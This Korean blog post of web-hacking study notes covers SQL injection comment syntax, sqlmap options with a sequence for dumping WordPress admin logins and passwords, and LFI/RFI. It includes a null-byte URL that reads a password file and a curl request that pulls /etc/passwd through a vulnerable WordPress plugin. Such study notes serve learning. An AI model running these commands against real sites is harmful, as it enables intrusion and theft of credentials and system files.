16.11.20 공부

Hacking/Web 2016. 11. 20. 18:45
반응형

SQL Injection 관련

* MySQL 주석처리

1) -- : 주의할 점은 -- 뒤에 반드시 스페이스로 한 칸을 띄워야 한다.

2) #


* sqlmap 옵션

 옵션

설명 

--url 

목표 URL 설정

sqlmap --url "http://test.com"

--level 

테스트 단계의 수준 설정, 1~5까지 있으며 숫자가 높을수록 깊은 단계의 테스트 수행

sqlmap --url "http://test.com" --level 3 

--risk 

테스트의 인젝션 위험도 설정, 0~3까지 있으며 숫자가 높을수록 위험도가 높음

sqlmap --url "http://test.com" --risk 3

--dbms 

DBMS를 지정하여 테스트하도록 강제

sqlmap --url "http://test.com" --DBMS MySQL 

--T 

DBMS의 테이블 지정

sqlmap --url "http://test.com" --DBMS MySQL --T [tablename] 

--columns 

DBMS의 해당 테이블에 있는 칼럼 나열

sqlmap --url "http://test.com" --DBMS MySQL --T [tablename] 

--columns

 --tables

DBMS의 테이블들 나열

sqlmap --url "http://test.com" --DBMS MySQL --tables

 -C

특정 칼럼의 정보 획득

sqlmap --url "http://test.com" --level 3 --risk 3 -T wp_users --columns -C user_login,user_pass 

 --dump

명령어 실행 결과를 파일로 저장

sqlmap --url "http://test.com" --level 3 --risk 3 -T wp_users --columns -C user_login,user_pass --dump 


* SQLmap 이용한 관리자 계정 정보 획득 공격 순서

1) 테이블 정보 확인

2) 유저 정보 테이블의 칼럼 확인

3) ID와 PW 칼럼의 정보를 확인하여 저장 


LFI & RFI 관련

* LFI = Local File Inclusion ( 서버에 직접 올린 악성코드를 include )

  RFI = Remote File Inclusion ( 외부 서버의 악성코드를 include )

 

* 웹 서버에 악성 코드를 넣는 기법

 - 대표적인 것이 PHP의 include 함수


* PHP는 C언어로 개발된 스크립트로 C언어의 특성을 물려받았다.

 - Null Byte(0x00)을 만나면 문자열의 끝으로 인식

 - Null Byte의 URL 인코딩 값 = '%00'


http://127.0.0.1/lfi/vulnerable.php?COLOR=C:\\Temp\\password.txt%00

 - 색을 매개변수로 받는 vulnerable.php에서 색 대신 서버 상의 파일을 입력 ( GET 방식이기 때문에 가능 )

 - vulnerable.php에서 파일명 뒤에 .php를 붙이기 때문에 Null Byte를 넣어 붙이지 않게 한다. ( = Null Byte 인젝션 = 퍼센트 인코딩(Percent Encoding) )


* cURL(Command line tool for transferring files with URL syntax) 

 = 커맨드 라인으로 HTTP 프로토콜 등의 데이터를 전송하는 도구

ex) curl -X POST -f "rootpath=/etc/passwd" --url http://192.168.0.2/wodrpress/wp-content/plugins/really-simple-guest-post/simple-guest-post-submit.php

(https://www.exploit-db.com/exploits/37209 취약점 관련)


*cURL 옵션

 -X는 무슨 HTTP 메서드를 사용하는지 옵션(GET,HEAD,POST,PUT,DELETE 등등)

 -X는 --request와 동일하다.

curl -X 명령어 == curl --request 명령어


* Path Traversal = 경로 탐색으로 특정 파일을 LFI시키는 것


참고 - 웹 해킹 입문 (이상한 지음, 프리렉 출판)

반응형

'Hacking > Web' 카테고리의 다른 글

해킹맛보기 웹 해킹 파트 정리  (0) 2017.01.08
구글 고급 연산자  (0) 2017.01.08
Burp Suite HTTPS에서도 사용하기  (0) 2017.01.07
구글 검색 패턴 DB  (0) 2015.02.13
구글 검색 연산자  (0) 2015.02.13
블로그 이미지

rootable

,